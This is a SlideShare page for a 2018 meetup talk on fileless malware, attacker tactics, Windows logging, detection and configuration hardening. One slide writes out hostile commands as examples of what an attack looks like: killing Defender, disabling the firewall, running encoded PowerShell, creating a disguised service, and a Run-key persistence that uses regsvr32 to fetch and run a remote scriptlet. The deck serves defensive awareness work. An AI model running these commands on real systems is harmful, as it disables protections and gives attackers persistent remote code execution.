SlideShare a Scribd company logo

Adversary tactics config mgmt-&-logs-oh-my

Jesse Moore
Jesse Moore

Jesse Presented at South Sound Hackers Meetup September 23rd 2018, to provide Security Awareness about Adversary tactics, logs and secure configs for Windows environment. https://www.meetup.com/SouthSound-hackers-Meetup/events/past/

Presentations & Public Speaking
1 of 45
Fileless Malware, Config Mgmt & Logs Oh My!!
> Following presentation contains my thoughts, ideas and opinions. They do not represent those of my current or past employers. > Any events, characters and company depicted in the course of this presentation are purely fictitious. Any similarity to actual events, characters and company is merely coincidental. > Do not use these tactics/techniques presented for evil. WARNING… Disclaimer
> What you will walk away from here with? – This slide deck! – Security awareness of Fileless Malware Adversary Tactics/Techniques and Detection. – Motivation to look at OS configurations (registry/services), logs, and simulate adversaries to secure your part of the world. Security depends on US! Together We Can Defend!
> Jesse Moore – Threat Detection and Response Team @ UW Medicine. – Certs are to many to list (lookup me up on LinkedIn) > GIAC Certified Forensics Analysts, GIAC Penetration Tester https://www.linkedin.com/in/jessefmoore/ Jessefmoore+DFIR@gmail.com Security Enablers, Just someone wanting to assist with Security! WHO Am I?
– Security awareness of some Fileless Malware Adversary Tactics/Techniques – In Memory attacks – Empire demo – Phish with SET – Abuse Windows features – PTH Demo – CIS-CAT (Configuration Assessment Tool) demo > Awareness of defense approaches – Logging > PowerShell Script Block > CMD line audit > Sysmonv8 logging > Registry Monitoring – Motivation to secure your part of the world > CIS Hardening URL > US-Cert Advisory > Logging Cheat Sheets > References to Adversary tactics. … What is the Agenda?
What’s that?¯_(ツ)_/¯ whoami systeminfo Qwinsta taskkill /f /im MsMpEng.exe netsh advfirewall set currentprofile state off netsh advfirewall set domainprofile state off netsh advfirewall set allprofiles state off powershell -nop -exec bypass -EncodedCommand "cABvAHcAZQByAHMAaABl” sc.exe create "svvchost" binpath= "c:tempsvvchost.exe" sc.exe start svvchost reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v "start" /d "regsvr32 /u /s /i:http://www.wingtiptoys.com/stext.sct scrobj.dll" /f Reference: https://gallery.technet.microsoft.com/Azure-Security-Center-549aa7a4
> What is the biggest Risk to org? – Taken together, phishing and pretexting represent 93% of all social breaches in the study. Email was the most common attack vector (96%) … Okay, lets talk stats Verizon Data Breach Investigations Report (DBIR) Phish  Creds -> OWA -> phish other users Phish  Creds -> OWA -> Find Systems account has access Phish  Creds -> VPN -> workstation Phish  Creds -> System Access-> Mimikatz – Phish  Creds -> System Access->Empire Phish  Creds -> System Access-> Meterpreter Phish  Creds -> System Access-> BloodHound https://www.cobaltstrike.com/downloads/csmanual311.pdf
https://www.cobaltstrike.com/downloads/csmanual311.pdf pg.12 Cobalt Strike- Adversary simulation software.
> Configuration Best Practices Must be aware to be prepared. Being prepared… What can I do? Reference: https://learn.cisecurity.org/cis-cat-landing-page
CIS Controls: 9 Limitation and Control of Network Ports, Protocols, and Services CIS_Microsoft_Windows_10_Enterprise_Release_1607_Benchmark_v1.2
> Patch Software – US-Cert Advisories: https://www.us-cert.gov/mailing-lists-and-feeds Must be aware to be prepared. Being Aware something is bad
What even looks bad? (Adversary Tactics)
http://www.nationalccdc.org/ Who has heard of Collegiate Cyber Defense Competition (CCDC)?
My Techniques
https://www.youtube.com/watch?v=VytjV2kPwSg TS session HiJacking (hmm I wonder?)
https://github.com/vysec/RedTips What even looks bad? (Adversary Tactics) Check with Community GitHubs and twitter
> https://blog.jpcert.or.jp/.s/2016/01/windows-commands-abused-by-attackers.html … JPCERT: Windows Commands Abused by Attackers
Mitigation Detection please? ATT&CK has them.
> system) … Enable PowerShell Script Block logging
…You know like PowerSploit, Nishang modules, etc Turn On PowerShell Module Logging
> Atomic Red Team has some Adversary TTPs mapped to ATT&CK framework. Check your defenses! Bad stuff? Adversary tactic code? Atomic RedTeam
EvntTrcngForWin C# Adversary tactic code? https://countercept.com/blog/detecting- malicious-use-of-net-part-2/
https://www.sans.org/security-resources/posters/dfir/windows-forensic-analysis-170 SANS Forensic poster
https://digital-forensics.sans.org/media/Poster_Windows_Forensics_2018_WEB.pdf SANS Forensics FREE Poster
https://www.sans.org/security-resources/posters/hunt-evil/165/download SANS Hunt Evil: Lateral Movement
https://github.com/olafhartong/sysmon-modular MSFT Sysmon Mapped to ATT&CK
Sysmon Turned On. Oh no.. (says attacker)
Use BloodHound to visualize accounts that may lead to sensitive stuff leaving your organization at Risk. Token Stealing? Monitor who logs on where & when? Reference: Derivative Local Admin http://www.sixdub.net/?p=591
BloodHound Attack (weaknesses) Paths
> Invoke-NinjaCopy.ps1 – Copy ntds.dit database along with SYSTEM HIV – Detection: PowerShellv5 Script Block Logging > DCSync (Empire) – Detection: https://github.com/shellster/DCSYNCMonitor > Compare HaveIBeenPWND ntlm hashses with ntds.dit ntlm hashes – Detection: https://jacksonvd.com/pwned-passwords-and- ntlm-hashes/ Get the hashes What about Active Directory?
> Monitor the Registry! – Disable Reversible Encryption – Disable LM and NTLM – Disable Credential Caching – LSA Protection Against Connection of Third-Party Modules – Disabling Wdigest – Prevent the use of saved passwords – Credential Guard (Win10 Enterprise/srvr2016) – Protected Users Security Group (Windows Server 2012 R2) – Prevent Getting Debug Privileges > disable SeDebugPrivilege. You can do it using GPO (local or domain one). Go to Computer Configuration -> Windows Settings -> Security Settings -> Local Policies -> User Rights Assignment and enable the policy Debug Program. … Mimikatz Detections
> Detect Cobalt Strike Beacon – https://blog.jpcert.or.jp/2018/08/volatility-plugin-for- detecting-cobalt-strike-beacon.html – SMB pipes from workstation to workstations > Detect Meterpreter – - rundll32.exe process , Poker ports, Network analysis – EDRs. Childproc_name:”rundll32.exe” AND digsig_result:”Unsigned” AND path:cwindows* – https://github.com/countercept/memory-carving-scripts … Fileless Malware Detections
> DEMO – Fileless Malware demo: > Detect Empire in memory with PowerShell script https://screencast-o-matic.com/u/vqZ/Find_FilelessMal Empire & Get-InjectedThread to detect Perform Memory (Empire) Attack & Detection!
> DEMO – Phish Attack (How bad can it be?) > Kali SET Phishing: https://screencast-o-matic.com/u/vqZ/Kali_SET_PhishingWebsite SET (PHISH) Attack Perform the PHISH attack!
> Windows – Abusing Windows > https://screencastomatic.com/u/vqZ/MulitRelayResponderSetup – https://www.youtube.com/watch?v=rjRDsXp_MNk (10:36 minutes) – https://screencast-o-matic.com/u/vqZ/BuildMacroExploitEmpire – https://screencast-o-matic.com/u/vqZ/CrackHashResponder > https://screencast-o-matic.com/u/vqZ/PTH-Detection Need to Monitor systems to find evidence of activities… What other attacks are there?
> DEMO – Automatically find Secure configs > CIS-CAT: Configuration Assessment Tool. > https://screencast-o-matic.com/u/vqZ/CIS- CAT Reference: > https://learn.cisecurity.org/cis-cat-landing-page Windows Config Benchmarks for Defense! Perform OS Configuration Hardening!
… Log-MD & Malware & Archaeology for Logs!!!
More Logs…. https://www.sans.org/summit-archives/file/summit-archive-1536351477.pdf DevonK (Endgame) and Roberto (SpectorOps)
Example of stuff in this Github Who can help in the Community? Hunt Scripts https://github.com/johnfranolich/Hunting-Scripts
> Time > Baseline (what is normal?) > Outliers (Frequency analysis) > Hunt behavior more than signatures > Build out capabilities (identify/expose) > Research… (understand attacks and build defense) … Look for Behavior
https://github.com/clong/DetectionLab Detection Lab
> Kansa (moduler) https://github.com/davehull/Kansa > GRR (Agent) https://grr-doc.readthedocs.io/ > HELK (Analytics) https://github.com/Cyb3rWard0g/HELK … Other BLUE Tools
– Best Practices > Center for Internet Security https://www.cisecurity.org/cybersecurity- best-practices/ (disable services/ports not needed (LLMNR)) > Check what Logs you need on system https://www.imfsecurity.com/compare/ > Enable PowerShell Script Block Logging (find Evil): https://www.fireeye.com/blog/threat- research/2016/02/greater_visibilityt.html > Monitor your Registry, WMI, cmdlines, API, exe > Hunt More Behavior and some signatures – Know Thy Enemy > Mitre ATT&CK https://attack.mitre.org/wiki/ATT%26CK_Matrix > Check Defenses with repo https://redcanary.com/atomic-red-team/ > Cobalt Strike Manual for TTPs: https://www.cobaltstrike.com/downloads/csmanual311.pdf Monitor your logs, Have Secure Configurations, Patch (Or Place in a Secure Enclave) & Simulate Adversary Tactics to obtain Detection mechanisms (behaviors)… The End… until next time.
… Yep that was a lot…

Recommended

!Instructions!
!Instructions!!Instructions!
!Instructions!
Henry Huarsaya Tito
 
Infosec Rss feeds
Infosec Rss feedsInfosec Rss feeds
Infosec Rss feedsMark Johnson
 
Niels G's security websites list
Niels G's security websites listNiels G's security websites list
Niels G's security websites listBill Hagestad II
 
Bug Bounty - Play For Money
Bug Bounty - Play For MoneyBug Bounty - Play For Money
Bug Bounty - Play For Money
Shubham Gupta
 
Crackfullworld
CrackfullworldCrackfullworld
Crackfullworld
Jonekey
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
Frans Rosén
 
Security theatre (Scotland php)
Security theatre (Scotland php)Security theatre (Scotland php)
Security theatre (Scotland php)
xsist10
 
Common hacking practices
Common hacking practicesCommon hacking practices
Common hacking practices
Marian Marinov
 

Recommended

!Instructions!
!Instructions!!Instructions!
!Instructions!
Henry Huarsaya Tito
 
Infosec Rss feeds
Infosec Rss feedsInfosec Rss feeds
Infosec Rss feedsMark Johnson
 
Niels G's security websites list
Niels G's security websites listNiels G's security websites list
Niels G's security websites listBill Hagestad II
 
Bug Bounty - Play For Money
Bug Bounty - Play For MoneyBug Bounty - Play For Money
Bug Bounty - Play For Money
Shubham Gupta
 
Crackfullworld
CrackfullworldCrackfullworld
Crackfullworld
Jonekey
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
Frans Rosén
 
Security theatre (Scotland php)
Security theatre (Scotland php)Security theatre (Scotland php)
Security theatre (Scotland php)
xsist10
 
Common hacking practices
Common hacking practicesCommon hacking practices
Common hacking practices
Marian Marinov
 
WordPress Security - Dealing With Today's Hacks
WordPress Security - Dealing With Today's HacksWordPress Security - Dealing With Today's Hacks
WordPress Security - Dealing With Today's HacksTony Perez
 
Win64 malware gen
Win64 malware genWin64 malware gen
Win64 malware gen
ssuser1eca7d
 
Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17
Sagar M Parmar
 
Mitigating CSRF with two lines of codes
Mitigating CSRF with two lines of codesMitigating CSRF with two lines of codes
Mitigating CSRF with two lines of codes
Minhaz A V
 
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...
Mazin Ahmed
 
TechCrunch Early Stage 2020 - How to prioritize security at your startup
TechCrunch Early Stage 2020 - How to prioritize security at your startupTechCrunch Early Stage 2020 - How to prioritize security at your startup
TechCrunch Early Stage 2020 - How to prioritize security at your startup
Casey Ellis
 
Bug Bounty - Hackers Job
Bug Bounty - Hackers JobBug Bounty - Hackers Job
Bug Bounty - Hackers JobArbin Godar
 
Bounty Craft: Bug bounty reports how do they work, @sushihack presents at Nu...
Bounty Craft: Bug bounty reports how do they work, @sushihack presents at Nu...Bounty Craft: Bug bounty reports how do they work, @sushihack presents at Nu...
Bounty Craft: Bug bounty reports how do they work, @sushihack presents at Nu...
HackerOne
 
Security Theatre - AmsterdamPHP
Security Theatre - AmsterdamPHPSecurity Theatre - AmsterdamPHP
Security Theatre - AmsterdamPHP
xsist10
 
Hackfest presentation.pptx
Hackfest presentation.pptxHackfest presentation.pptx
Hackfest presentation.pptx
Peter Yaworski
 
Bug Bounty Secrets
Bug Bounty Secrets Bug Bounty Secrets
Bug Bounty Secrets
n|u - The Open Security Community
 
Security Theatre - Benelux
Security Theatre - BeneluxSecurity Theatre - Benelux
Security Theatre - Benelux
xsist10
 
Security Theatre - PHP UK Conference
Security Theatre - PHP UK ConferenceSecurity Theatre - PHP UK Conference
Security Theatre - PHP UK Conference
xsist10
 
Corncon 2021 - Inside the Unlikely Romance
Corncon 2021 - Inside the Unlikely RomanceCorncon 2021 - Inside the Unlikely Romance
Corncon 2021 - Inside the Unlikely Romance
Casey Ellis
 
Derbycon 2017: Hunting Lateral Movement For Fun & Profit
Derbycon 2017: Hunting Lateral Movement For Fun & ProfitDerbycon 2017: Hunting Lateral Movement For Fun & Profit
Derbycon 2017: Hunting Lateral Movement For Fun & Profit
Mauricio Velazco
 
Million Browser Botnet
Million Browser BotnetMillion Browser Botnet
Million Browser Botnet
Source Conference
 
Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012
Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012
Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012
Nir Goldshlager
 
Help mijn website is gehackt - Joomla User Group Den Bosch 2014
Help mijn website is gehackt - Joomla User Group Den Bosch 2014Help mijn website is gehackt - Joomla User Group Den Bosch 2014
Help mijn website is gehackt - Joomla User Group Den Bosch 2014
Peter Martin
 
WORDPRESS SECURITY: HOW TO AVOID BEING HACKED
WORDPRESS SECURITY: HOW TO AVOID BEING HACKEDWORDPRESS SECURITY: HOW TO AVOID BEING HACKED
WORDPRESS SECURITY: HOW TO AVOID BEING HACKED
StuartJDavidson.com
 
Bug bounty or beg bounty?
Bug bounty or beg bounty?Bug bounty or beg bounty?
Bug bounty or beg bounty?
Casey Ellis
 
Modern malware and threats
Modern malware and threatsModern malware and threats
Modern malware and threats
Martin Holovský
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical Hacking
Raghav Bisht
 

More Related Content

What's hot

WordPress Security - Dealing With Today's Hacks
WordPress Security - Dealing With Today's HacksWordPress Security - Dealing With Today's Hacks
WordPress Security - Dealing With Today's HacksTony Perez
 
Win64 malware gen
Win64 malware genWin64 malware gen
Win64 malware gen
ssuser1eca7d
 
Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17
Sagar M Parmar
 
Mitigating CSRF with two lines of codes
Mitigating CSRF with two lines of codesMitigating CSRF with two lines of codes
Mitigating CSRF with two lines of codes
Minhaz A V
 
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...
Mazin Ahmed
 
TechCrunch Early Stage 2020 - How to prioritize security at your startup
TechCrunch Early Stage 2020 - How to prioritize security at your startupTechCrunch Early Stage 2020 - How to prioritize security at your startup
TechCrunch Early Stage 2020 - How to prioritize security at your startup
Casey Ellis
 
Bug Bounty - Hackers Job
Bug Bounty - Hackers JobBug Bounty - Hackers Job
Bug Bounty - Hackers JobArbin Godar
 
Bounty Craft: Bug bounty reports how do they work, @sushihack presents at Nu...
Bounty Craft: Bug bounty reports how do they work, @sushihack presents at Nu...Bounty Craft: Bug bounty reports how do they work, @sushihack presents at Nu...
Bounty Craft: Bug bounty reports how do they work, @sushihack presents at Nu...
HackerOne
 
Security Theatre - AmsterdamPHP
Security Theatre - AmsterdamPHPSecurity Theatre - AmsterdamPHP
Security Theatre - AmsterdamPHP
xsist10
 
Hackfest presentation.pptx
Hackfest presentation.pptxHackfest presentation.pptx
Hackfest presentation.pptx
Peter Yaworski
 
Bug Bounty Secrets
Bug Bounty Secrets Bug Bounty Secrets
Bug Bounty Secrets
n|u - The Open Security Community
 
Security Theatre - Benelux
Security Theatre - BeneluxSecurity Theatre - Benelux
Security Theatre - Benelux
xsist10
 
Security Theatre - PHP UK Conference
Security Theatre - PHP UK ConferenceSecurity Theatre - PHP UK Conference
Security Theatre - PHP UK Conference
xsist10
 
Corncon 2021 - Inside the Unlikely Romance
Corncon 2021 - Inside the Unlikely RomanceCorncon 2021 - Inside the Unlikely Romance
Corncon 2021 - Inside the Unlikely Romance
Casey Ellis
 
Derbycon 2017: Hunting Lateral Movement For Fun & Profit
Derbycon 2017: Hunting Lateral Movement For Fun & ProfitDerbycon 2017: Hunting Lateral Movement For Fun & Profit
Derbycon 2017: Hunting Lateral Movement For Fun & Profit
Mauricio Velazco
 
Million Browser Botnet
Million Browser BotnetMillion Browser Botnet
Million Browser Botnet
Source Conference
 
Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012
Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012
Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012
Nir Goldshlager
 
Help mijn website is gehackt - Joomla User Group Den Bosch 2014
Help mijn website is gehackt - Joomla User Group Den Bosch 2014Help mijn website is gehackt - Joomla User Group Den Bosch 2014
Help mijn website is gehackt - Joomla User Group Den Bosch 2014
Peter Martin
 
WORDPRESS SECURITY: HOW TO AVOID BEING HACKED
WORDPRESS SECURITY: HOW TO AVOID BEING HACKEDWORDPRESS SECURITY: HOW TO AVOID BEING HACKED
WORDPRESS SECURITY: HOW TO AVOID BEING HACKED
StuartJDavidson.com
 
Bug bounty or beg bounty?
Bug bounty or beg bounty?Bug bounty or beg bounty?
Bug bounty or beg bounty?
Casey Ellis
 

What's hot (20)

WordPress Security - Dealing With Today's Hacks
WordPress Security - Dealing With Today's HacksWordPress Security - Dealing With Today's Hacks
WordPress Security - Dealing With Today's Hacks
 
Win64 malware gen
Win64 malware genWin64 malware gen
Win64 malware gen
 
Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17
 
Mitigating CSRF with two lines of codes
Mitigating CSRF with two lines of codesMitigating CSRF with two lines of codes
Mitigating CSRF with two lines of codes
 
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and A...
 
TechCrunch Early Stage 2020 - How to prioritize security at your startup
TechCrunch Early Stage 2020 - How to prioritize security at your startupTechCrunch Early Stage 2020 - How to prioritize security at your startup
TechCrunch Early Stage 2020 - How to prioritize security at your startup
 
Bug Bounty - Hackers Job
Bug Bounty - Hackers JobBug Bounty - Hackers Job
Bug Bounty - Hackers Job
 
Bounty Craft: Bug bounty reports how do they work, @sushihack presents at Nu...
Bounty Craft: Bug bounty reports how do they work, @sushihack presents at Nu...Bounty Craft: Bug bounty reports how do they work, @sushihack presents at Nu...
Bounty Craft: Bug bounty reports how do they work, @sushihack presents at Nu...
 
Security Theatre - AmsterdamPHP
Security Theatre - AmsterdamPHPSecurity Theatre - AmsterdamPHP
Security Theatre - AmsterdamPHP
 
Hackfest presentation.pptx
Hackfest presentation.pptxHackfest presentation.pptx
Hackfest presentation.pptx
 
Bug Bounty Secrets
Bug Bounty Secrets Bug Bounty Secrets
Bug Bounty Secrets
 
Security Theatre - Benelux
Security Theatre - BeneluxSecurity Theatre - Benelux
Security Theatre - Benelux
 
Security Theatre - PHP UK Conference
Security Theatre - PHP UK ConferenceSecurity Theatre - PHP UK Conference
Security Theatre - PHP UK Conference
 
Corncon 2021 - Inside the Unlikely Romance
Corncon 2021 - Inside the Unlikely RomanceCorncon 2021 - Inside the Unlikely Romance
Corncon 2021 - Inside the Unlikely Romance
 
Derbycon 2017: Hunting Lateral Movement For Fun & Profit
Derbycon 2017: Hunting Lateral Movement For Fun & ProfitDerbycon 2017: Hunting Lateral Movement For Fun & Profit
Derbycon 2017: Hunting Lateral Movement For Fun & Profit
 
Million Browser Botnet
Million Browser BotnetMillion Browser Botnet
Million Browser Botnet
 
Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012
Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012
Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012
 
Help mijn website is gehackt - Joomla User Group Den Bosch 2014
Help mijn website is gehackt - Joomla User Group Den Bosch 2014Help mijn website is gehackt - Joomla User Group Den Bosch 2014
Help mijn website is gehackt - Joomla User Group Den Bosch 2014
 
WORDPRESS SECURITY: HOW TO AVOID BEING HACKED
WORDPRESS SECURITY: HOW TO AVOID BEING HACKEDWORDPRESS SECURITY: HOW TO AVOID BEING HACKED
WORDPRESS SECURITY: HOW TO AVOID BEING HACKED
 
Bug bounty or beg bounty?
Bug bounty or beg bounty?Bug bounty or beg bounty?
Bug bounty or beg bounty?
 

Similar to Adversary tactics config mgmt-&-logs-oh-my

Modern malware and threats
Modern malware and threatsModern malware and threats
Modern malware and threats
Martin Holovský
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical Hacking
Raghav Bisht
 
Advanced malware analysis training session 7 malware memory forensics
Advanced malware analysis training session 7 malware memory forensicsAdvanced malware analysis training session 7 malware memory forensics
Advanced malware analysis training session 7 malware memory forensics
Cysinfo Cyber Security Community
 
Blue team reboot - HackFest
Blue team reboot - HackFest Blue team reboot - HackFest
Blue team reboot - HackFest
Haydn Johnson
 
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware InfectionScaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Wayne Huang
 
TRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , TexasTRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , TexasAditya K Sood
 
Hunting Ghost RAT Using Memory Forensics
Hunting Ghost RAT Using Memory ForensicsHunting Ghost RAT Using Memory Forensics
Hunting Ghost RAT Using Memory Forensics
securityxploded
 
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity
George Boobyer
 
Hunting gh0st rat using memory forensics
Hunting gh0st rat using memory forensics Hunting gh0st rat using memory forensics
Hunting gh0st rat using memory forensics
Cysinfo Cyber Security Community
 
Pentesting with linux
Pentesting with linuxPentesting with linux
Pentesting with linux
Hammad Ahmed Khawaja
 
Bsides NYC 2018 - Hunting for Lateral Movement
Bsides NYC 2018 - Hunting for Lateral MovementBsides NYC 2018 - Hunting for Lateral Movement
Bsides NYC 2018 - Hunting for Lateral Movement
Mauricio Velazco
 
Malware Analysis Made Simple
Malware Analysis Made SimpleMalware Analysis Made Simple
Malware Analysis Made Simple
Paul Melson
 
Reversing & malware analysis training part 8 malware memory forensics
Reversing & malware analysis training part 8 malware memory forensicsReversing & malware analysis training part 8 malware memory forensics
Reversing & malware analysis training part 8 malware memory forensicsAbdulrahman Bassam
 
Advanced malware analysis training session1 detection and removal of malwares
Advanced malware analysis training session1 detection and removal of malwaresAdvanced malware analysis training session1 detection and removal of malwares
Advanced malware analysis training session1 detection and removal of malwares
Cysinfo Cyber Security Community
 
42 - Malware - Understand the Threat and How to Respond
42 - Malware - Understand the Threat and How to Respond42 - Malware - Understand the Threat and How to Respond
42 - Malware - Understand the Threat and How to Respond
Thomas Roccia
 
Modern Malware and Threats
Modern Malware and ThreatsModern Malware and Threats
Modern Malware and Threats
MarketingArrowECS_CZ
 
INTERFACE by apidays 2023 - Securing LLM and NLP APIs, Ads Dawson & Jared Kra...
INTERFACE by apidays 2023 - Securing LLM and NLP APIs, Ads Dawson & Jared Kra...INTERFACE by apidays 2023 - Securing LLM and NLP APIs, Ads Dawson & Jared Kra...
INTERFACE by apidays 2023 - Securing LLM and NLP APIs, Ads Dawson & Jared Kra...
apidays
 
HackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware AnalysisHackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware Analysis
Antonio Parata
 

Similar to Adversary tactics config mgmt-&-logs-oh-my (20)

Modern malware and threats
Modern malware and threatsModern malware and threats
Modern malware and threats
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical Hacking
 
Advanced malware analysis training session 7 malware memory forensics
Advanced malware analysis training session 7 malware memory forensicsAdvanced malware analysis training session 7 malware memory forensics
Advanced malware analysis training session 7 malware memory forensics
 
Blue team reboot - HackFest
Blue team reboot - HackFest Blue team reboot - HackFest
Blue team reboot - HackFest
 
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware InfectionScaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
 
TRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , TexasTRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , Texas
 
Hunting Ghost RAT Using Memory Forensics
Hunting Ghost RAT Using Memory ForensicsHunting Ghost RAT Using Memory Forensics
Hunting Ghost RAT Using Memory Forensics
 
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity
 
Hunting gh0st rat using memory forensics
Hunting gh0st rat using memory forensics Hunting gh0st rat using memory forensics
Hunting gh0st rat using memory forensics
 
Pentesting with linux
Pentesting with linuxPentesting with linux
Pentesting with linux
 
Super1
Super1Super1
Super1
 
Bsides NYC 2018 - Hunting for Lateral Movement
Bsides NYC 2018 - Hunting for Lateral MovementBsides NYC 2018 - Hunting for Lateral Movement
Bsides NYC 2018 - Hunting for Lateral Movement
 
Malware Analysis Made Simple
Malware Analysis Made SimpleMalware Analysis Made Simple
Malware Analysis Made Simple
 
Reversing & malware analysis training part 8 malware memory forensics
Reversing & malware analysis training part 8 malware memory forensicsReversing & malware analysis training part 8 malware memory forensics
Reversing & malware analysis training part 8 malware memory forensics
 
Advanced malware analysis training session1 detection and removal of malwares
Advanced malware analysis training session1 detection and removal of malwaresAdvanced malware analysis training session1 detection and removal of malwares
Advanced malware analysis training session1 detection and removal of malwares
 
42 - Malware - Understand the Threat and How to Respond
42 - Malware - Understand the Threat and How to Respond42 - Malware - Understand the Threat and How to Respond
42 - Malware - Understand the Threat and How to Respond
 
Modern Malware and Threats
Modern Malware and ThreatsModern Malware and Threats
Modern Malware and Threats
 
INTERFACE by apidays 2023 - Securing LLM and NLP APIs, Ads Dawson & Jared Kra...
INTERFACE by apidays 2023 - Securing LLM and NLP APIs, Ads Dawson & Jared Kra...INTERFACE by apidays 2023 - Securing LLM and NLP APIs, Ads Dawson & Jared Kra...
INTERFACE by apidays 2023 - Securing LLM and NLP APIs, Ads Dawson & Jared Kra...
 
HackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware AnalysisHackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware Analysis
 
Computer Security
Computer SecurityComputer Security
Computer Security
 

Recently uploaded

Getting started with Amazon Bedrock Studio and Control Tower
Getting started with Amazon Bedrock Studio and Control TowerGetting started with Amazon Bedrock Studio and Control Tower
Getting started with Amazon Bedrock Studio and Control Tower
Vladimir Samoylov
 
Bonzo subscription_hjjjjjjjj5hhhhhhh_2024.pdf
Bonzo subscription_hjjjjjjjj5hhhhhhh_2024.pdfBonzo subscription_hjjjjjjjj5hhhhhhh_2024.pdf
Bonzo subscription_hjjjjjjjj5hhhhhhh_2024.pdf
khadija278284
 
Obesity causes and management and associated medical conditions
Obesity causes and management and associated medical conditionsObesity causes and management and associated medical conditions
Obesity causes and management and associated medical conditions
Faculty of Medicine And Health Sciences
 
somanykidsbutsofewfathers-140705000023-phpapp02.pptx
somanykidsbutsofewfathers-140705000023-phpapp02.pptxsomanykidsbutsofewfathers-140705000023-phpapp02.pptx
somanykidsbutsofewfathers-140705000023-phpapp02.pptx
Howard Spence
 
Competition and Regulation in Professional Services – KLEINER – June 2024 OEC...
Competition and Regulation in Professional Services – KLEINER – June 2024 OEC...Competition and Regulation in Professional Services – KLEINER – June 2024 OEC...
Competition and Regulation in Professional Services – KLEINER – June 2024 OEC...
OECD Directorate for Financial and Enterprise Affairs
 
Doctoral Symposium at the 17th IEEE International Conference on Software Test...
Doctoral Symposium at the 17th IEEE International Conference on Software Test...Doctoral Symposium at the 17th IEEE International Conference on Software Test...
Doctoral Symposium at the 17th IEEE International Conference on Software Test...
Sebastiano Panichella
 
Acorn Recovery: Restore IT infra within minutes
Acorn Recovery: Restore IT infra within minutesAcorn Recovery: Restore IT infra within minutes
Acorn Recovery: Restore IT infra within minutes
IP ServerOne
 
Announcement of 18th IEEE International Conference on Software Testing, Verif...
Announcement of 18th IEEE International Conference on Software Testing, Verif...Announcement of 18th IEEE International Conference on Software Testing, Verif...
Announcement of 18th IEEE International Conference on Software Testing, Verif...
Sebastiano Panichella
 
International Workshop on Artificial Intelligence in Software Testing
International Workshop on Artificial Intelligence in Software TestingInternational Workshop on Artificial Intelligence in Software Testing
International Workshop on Artificial Intelligence in Software Testing
Sebastiano Panichella
 
0x01 - Newton's Third Law: Static vs. Dynamic Abusers
0x01 - Newton's Third Law: Static vs. Dynamic Abusers0x01 - Newton's Third Law: Static vs. Dynamic Abusers
0x01 - Newton's Third Law: Static vs. Dynamic Abusers
OWASP Beja
 
Bitcoin Lightning wallet and tic-tac-toe game XOXO
Bitcoin Lightning wallet and tic-tac-toe game XOXOBitcoin Lightning wallet and tic-tac-toe game XOXO
Bitcoin Lightning wallet and tic-tac-toe game XOXO
